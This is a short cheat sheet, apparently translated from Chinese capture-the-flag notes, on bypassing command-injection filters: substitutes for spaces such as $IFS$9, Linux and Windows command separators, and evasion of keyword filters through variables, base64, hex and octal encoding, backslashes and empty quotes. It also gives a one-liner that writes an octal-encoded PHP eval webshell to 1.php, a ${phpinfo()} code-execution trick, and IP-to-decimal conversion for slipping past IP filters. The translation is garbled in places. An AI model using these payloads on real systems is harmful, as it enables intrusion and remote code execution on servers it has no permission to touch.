notes
Space Filter:
In bash, you can use the following characters instead of spaces
< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等
$ Representing the separator at the IFS linux, but if a simple cat $ IFS2, bash interpreter will entire variable name as IFS2, resulting in lost out the results, however, if {} is fixed plus a variable name, in the same way back plus a $ truncation can play a role, but why should $ 9, because the only holders of $ 9 ninth parameter of the current system shell process, it is always an empty string.
Command delimiter
In linux:% 0A, 0D%,;, &, |, &&, ||
Windows are:% 0a, &, |, % 1a ( a magical role as .bat file command separator)
; In the shell, as "continuous instruction" symbol feature is the "semicolon." Command is executed in the order (left to right), and can be separated by semicolons. When a command fails, it does not interrupt the execution of other commands .
& Simple stitching without restriction
Behind the success of the implementation will be performed in front &&
| Output as a symbol on the left to the right input, the output of the left does not show. When the first command fails, it will still execute the second command
|| fails will be performed in front of the back
Sensitive character filtering bypass
Filtered ls, cat, flag, etc.
- The use of variable bypass
a=l;b=s;$a$b- Encoding bypass
base
root@kali:~# echo 'cat' | base64
Y2F0Cg==
root@kali:~# `echo 'Y2F0Cg==' | base64 -d` test.txt
hello world!
root@kali:~#hex:
echo "636174202f666c6167" | xxd -r -p|bash ==>cat /flagoct :
$(printf "\154\163") ==>ls
$(printf "\x63\x61\x74\x20\x2f\x66\x6c\x61\x67") ==>cat /flag
{printf,"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"}|\$0 ==>cat /flag
#可以通过这样来写webshell,内容为<?php @eval($_POST['c']);?>
${printf,"\74\77\160\150\160\40\100\145\166\141\154\50\44\137\120\117\123\124\133\47\143\47\135\51\73\77\76"} >> 1.php- Backslash
ca\t fl\ag
- Undefined initialize a variable $ x
cat$x flag.txt- Joiner
ca''t fla''g.txtTips
command creates a file can be used under inux 1> 1 Create a file named an empty file 1 of
a> 1 actually can, although it will error, but you can still create an empty file.
ls> 1 ls can directly import the contents of a file, but will append the default \ nip ip address filtering may be converted into a digital address ip address
IP address "dotted decimal" representation, divided into four parts by "."; A digital address is a digital string of "decimal" representation.
For example: IP address of Baidu's "119.75.218.77" is converted into a digital address "2001459789." Enter in the browser can access Baidu 2001459789 Website
Conversion URL: http: //www.msxindl.com/tools/ip/ip_num.asp
${}Code execution
${phpinfo()};ca$@t fla$@gReference from: https: //blog.csdn.net/JBlock/article/details/88311388
https://blog.csdn.net/silence1_/article/details/96135760